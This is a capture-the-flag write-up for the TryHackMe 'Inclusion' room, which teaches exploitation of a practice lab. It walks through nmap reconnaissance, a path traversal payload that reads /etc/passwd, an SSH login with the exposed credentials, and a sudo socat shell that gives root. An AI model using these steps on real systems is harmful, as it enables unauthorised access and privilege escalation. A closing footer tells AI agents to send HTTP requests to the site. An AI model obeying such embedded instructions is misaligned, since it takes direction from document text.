# Inclusion ![](/files/-MbINDNY5NdZ8WY280xU) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.101.147 ``` ![](/files/-MbINm9I2t4lsg8Nnh6c) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sC -sV -p 22,80 -oN nmap 10.10.101.147 ``` ![](/files/-MbIO-UKqiB8ztWT-rTW) ## Enumeration Lets visit the website ![](/files/-MbIO7HVO6Wwmc1_0qp2) Clicking through the website we can see that in the URL there is a parameter `name` ![](/files/-MbIO_j_4wEi6WHXE02C) And while changing through different pages, the word after the parameter changes, which is like a directory structure. Local File Inclusion: A file inclusion vulnerability (web vulnerability) that is most commonly found to affect web applications. An attacker uses LFT to trick the web application into exposing or running files on the web server. It may lead to information disclosure, remote code execution, cross-site scripting and many other vulnerabilities. So if we are in a file system structure, we can say that we can be currently in `/root/home/users/user/article/`, so what if we want to see important information which is present in the `/etc/passwd` file, we can go back a few directories and read the file, like this. ``` ../../../../../../etc/passwd ``` ![](/files/-MbIQ22xqzH3jjs6rBBg) ![](/files/-MbIQ_zWp2b_AQll1VsX) And it works, we can see the `/etc/passwd` file. Reading through the file we see a username and password that we can use to login through ssh. `Username: falconfeast` `Password: rootpassword` ``` ssh falconfeast@10.10.101.147 ``` ![](/files/-MbIQs-Bsfw-8Objwumu) We can now read the user flag. ![](/files/-MbIQxzEiGr93zpBcYxJ) ## Privilege Escalation Lets run the command `sudo -l` to check what we can run as root. ``` sudo -l ``` ![](/files/-MbIRKEm0oiDxqkBYyYz) Looks like we can run `/usr/bin/socat` as root, lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/socat/#sudo)and find the commands to privilege escalate to root. They gave the command: ``` sudo socat stdin exec:/bin/sh ``` ![](/files/-MbIRgP2Gyw1JTtX_GYW) We are now root, we can go read the root flag and answer the last question of this room. ![](/files/-MbIRrN59E10jHDB-IB2) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/inclusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.